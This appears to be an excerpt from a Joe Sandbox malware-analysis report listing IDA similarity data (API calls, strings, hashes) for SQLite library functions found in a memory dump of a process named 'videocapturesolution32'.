                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                          • API String ID: 1320758876-2501389569
                                                          • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                          • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                          • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                          • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                          • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                          • API String ID: 937752868-2111127023
                                                          • Opcode ID: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                          • Instruction ID: 65a1564e5812e901c47d2d0e8e64920046ae54dd737849fc0956122b524b53c9
                                                          • Opcode Fuzzy Hash: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                          • Instruction Fuzzy Hash: 19512C706187018FE700AF69D88575DBFF6AFA5708F10C81DE8999B214EB78C845DF42
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                          • String ID: @$access$cache
                                                          • API String ID: 4158134138-1361544076
                                                          • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                          • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                          • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                          • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                          APIs
                                                          Strings
                                                          • BEGIN;, xrefs: 609485DB
                                                          • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                          • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                          • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                          • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                          • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                          • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                          • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                          • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                          • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                          • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                          • API String ID: 632333372-52344843
                                                          • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                          • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                          • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                          • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                          APIs
                                                            • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                            • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                            • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                            • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                            • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                            • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                            • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                          • sqlite3_malloc.SQLITE3 ref: 60960384
                                                          • sqlite3_free.SQLITE3 ref: 609605EA
                                                          • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                          • sqlite3_free.SQLITE3 ref: 60960618
                                                          • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                          • String ID: offsets
                                                          • API String ID: 463808202-2642679573
                                                          • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                          • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                          • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                          • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                          APIs
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                          • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                          • String ID:
                                                          • API String ID: 2903785150-0
                                                          • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                          • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                          • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                          • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_malloc
                                                          • String ID:
                                                          • API String ID: 423083942-0
                                                          • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                          • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                          • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                          • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                          • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                          • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                          • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                          • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                          • String ID:
                                                          • API String ID: 3556715608-0
                                                          • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                          • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                          • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                          • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                          APIs
                                                          • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                          • sqlite3_exec.SQLITE3 ref: 6095F686
                                                            • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                          • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                          • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                            • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                            • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                          • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                          • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                          • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                          • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                          • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                          • String ID:
                                                          • API String ID: 1866449048-0
                                                          • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                          • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                          • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                          • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                          APIs
                                                          • sqlite3_finalize.SQLITE3 ref: 609407B4
                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                          • sqlite3_finalize.SQLITE3 ref: 609407C2
                                                            • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
                                                          • sqlite3_finalize.SQLITE3 ref: 609407D0
                                                          • sqlite3_finalize.SQLITE3 ref: 609407DE
                                                          • sqlite3_finalize.SQLITE3 ref: 609407EC
                                                          • sqlite3_finalize.SQLITE3 ref: 609407FA
                                                          • sqlite3_finalize.SQLITE3 ref: 60940808
                                                          • sqlite3_finalize.SQLITE3 ref: 60940816
                                                          • sqlite3_finalize.SQLITE3 ref: 60940824
                                                          • sqlite3_free.SQLITE3 ref: 6094082C
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
                                                          • String ID:
                                                          • API String ID: 14011187-0
                                                          • Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                          • Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
                                                          • Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                          • Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                          • API String ID: 0-780898
                                                          • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                          • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                          • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                          • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                          • API String ID: 0-2604012851
                                                          • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                          • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                          • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                          • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                          • String ID: 0$SQLite format 3
                                                          • API String ID: 3174206576-3388949527
                                                          • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                          • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                          • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                          • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                          APIs
                                                          • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                          • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                          • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                          • sqlite3_free.SQLITE3 ref: 6095F180
                                                            • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                            • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                          • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
